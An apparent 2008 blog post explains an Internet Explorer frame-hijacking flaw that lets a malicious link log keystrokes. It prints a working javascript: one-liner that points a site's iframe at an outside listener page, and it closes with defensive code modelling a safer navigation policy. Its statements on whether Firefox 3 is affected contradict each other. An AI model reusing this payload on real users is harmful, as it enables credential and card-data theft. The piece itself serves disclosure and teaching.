Browser vulnerabilities are nothing new, and they are constantly popping up no matter what software you’re using. Today, however, there’s an especially eerie one that Ghacks found which currently affects almost all versions of Internet Explorer 6, 7, and 8. It’s capable of recording all of your keystrokes even after you’ve left the site that you were visiting.




Update (6/27/2008 @ 1:34PM CST): As some commenters have pointed out this vulnerability does affect Firefox 3 users as well.

How does it work? First the user must click on a malicious link that uses JavaScript to open a URL in a new window/tab. The site that you were expecting to open will be displayed without any issues, and you’ll likely assume that you’ve completely left the referring site. Once the JavaScript code finishes executing it will hijack the first iframe that it finds on the website, and it will begin capturing any of your keystrokes.

Want some proof? This site has an example link to demonstrate how it works. To show just how versatile this is I modified a small portion of the code so that it opens our homepage, and takes over the first iframe that appears at the very top. Here’s what the code looks like, and click on it to see what I’m talking about:

javascript:x=open('http://cybernetnews.com/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

If you are using a susceptible browser you should have noticed that the iframe at the top of the page turned solid red, and anytime you pressed a key on the keyboard it displayed in the box:

[Screenshot: ie javascript vulnerability-1.png]

I didn’t modify our site’s code in any way to get this to work, and any site you visit that uses iframes is susceptible to being a host for the vulnerability. That means it could easily steal login credentials or credit card information, assuming an iframe is available on the page. Scary, huh?

As of right now a proof-of-concept is only available for Internet Explorer, but with a little more work it’s possible that it could also affect other browsers. I have verified that the current method works in Internet Explorer 6, and it doesn’t work in Firefox 3, Opera 9.5, and Safari 3. Here’s more information on how the vulnerability operates.
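The reason the link above works is a frame-navigation policy question: the browser let a window that merely held a handle to another window (the one returned by `open()`) navigate any frame inside it, regardless of origin. The defence browsers later standardised on is a "descendant" policy, where a script may only navigate a frame if it is same-origin with that frame or with one of the frame's ancestors. The code below is an added example written for this page, not code from the article or from the sites it links; it models both policies with plain objects (constructed origins, windows and URLs, with `attacker.example` and `victim.example` as stand-ins) and shows that the permissive rule lets the cross-window hijack through while the descendant rule refuses it without breaking a site's navigation of its own iframes. The policy function is a simplified educational model, not the HTML specification text.

```javascript
// Added example (not the article's code): a simplified model of the
// "descendant" frame-navigation policy. Browsing contexts, origins and
// URLs below are constructed for illustration.

function makeContext(name, origin, parent = null, opener = null) {
  return { name, origin, parent, opener, location: origin + '/' };
}

// Every ancestor browsing context of ctx, nearest first.
function ancestors(ctx) {
  const chain = [];
  for (let p = ctx.parent; p !== null; p = p.parent) chain.push(p);
  return chain;
}

// Permissive policy (the behaviour the article observed): any script that
// holds a handle to a window may navigate any frame inside it.
function permissiveAllowed(source, target) {
  return true;
}

// Descendant policy (simplified educational model, not the HTML spec text):
// source may navigate target only if source is target, source is same-origin
// with target or with one of target's ancestors, or target is the top-level
// window that source opened (window.open hands the opener that handle).
function descendantAllowed(source, target) {
  if (source === target) return true;
  if (target.parent === null && target.opener === source) return true;
  return [target, ...ancestors(target)].some(c => c.origin === source.origin);
}

// Attempt a navigation under a given policy. Returns true if target moved.
function navigate(policy, source, target, url) {
  if (!policy(source, target)) return false;
  target.location = url;
  return true;
}

// Constructed scenario mirroring the article: an attacker-origin window opens
// the victim site, the victim site embeds a same-origin iframe, and the
// opener then tries to point frames[0] at a keystroke-listener page.
function runScenario(policy) {
  const attacker = makeContext('attacker', 'http://attacker.example');
  const victimTop = makeContext('victimTop', 'http://victim.example', null, attacker);
  const victimFrame = makeContext('victimFrame', 'http://victim.example', victimTop);
  const listenerUrl = 'http://attacker.example/listener.html'; // constructed

  const hijacked = navigate(policy, attacker, victimFrame, listenerUrl);
  const frameAfterHijackAttempt = victimFrame.location;

  // Legitimate navigations that a correct policy must still permit:
  // the victim page moving its own iframe, and the opener moving the
  // top-level window it created (what window.open is for).
  const ownNav = navigate(policy, victimTop, victimFrame, 'http://victim.example/widget');
  const openerTopNav = navigate(policy, attacker, victimTop, 'http://victim.example/other');

  return { hijacked, frameAfterHijackAttempt, ownNav, openerTopNav };
}

console.log('permissive:', runScenario(permissiveAllowed));
console.log('descendant:', runScenario(descendantAllowed));
```

Under the permissive policy the iframe ends up at the listener URL, which is exactly the red keystroke box in the screenshot; under the descendant policy the attacker window's attempt is refused while the victim page's own iframe navigation and the opener's navigation of the top-level window both still succeed. A site cannot enforce this itself from script, since it cannot read a cross-origin frame's location, so the fix has to live in the browser's policy.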